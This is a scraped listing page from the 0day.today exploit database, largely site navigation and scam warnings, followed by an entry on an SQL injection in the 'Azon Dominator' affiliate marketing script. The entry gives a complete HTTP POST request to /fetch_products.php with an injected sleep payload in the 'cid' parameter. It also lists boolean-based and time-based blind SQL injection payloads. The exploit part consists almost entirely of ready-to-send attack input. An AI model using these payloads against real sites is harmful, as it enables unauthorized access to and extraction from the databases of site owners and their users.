0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Azon Dominator Affiliate Marketing Script - SQL Injection Vulnerability
# Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection # Exploit Author: Buğra Enis Dönmez # Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script # Demo Site: https://azon-dominator.webister.net/ # Tested on: Arch Linux # CVE: N/A ### Request ### POST /fetch_products.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost/ Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8 Content-Length: 79 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112 ### ### Parameter & Payloads ### Parameter: cid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1) AND 7735=7735 AND (5267=5267 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442 ### # 0day.today [2024-07-07] #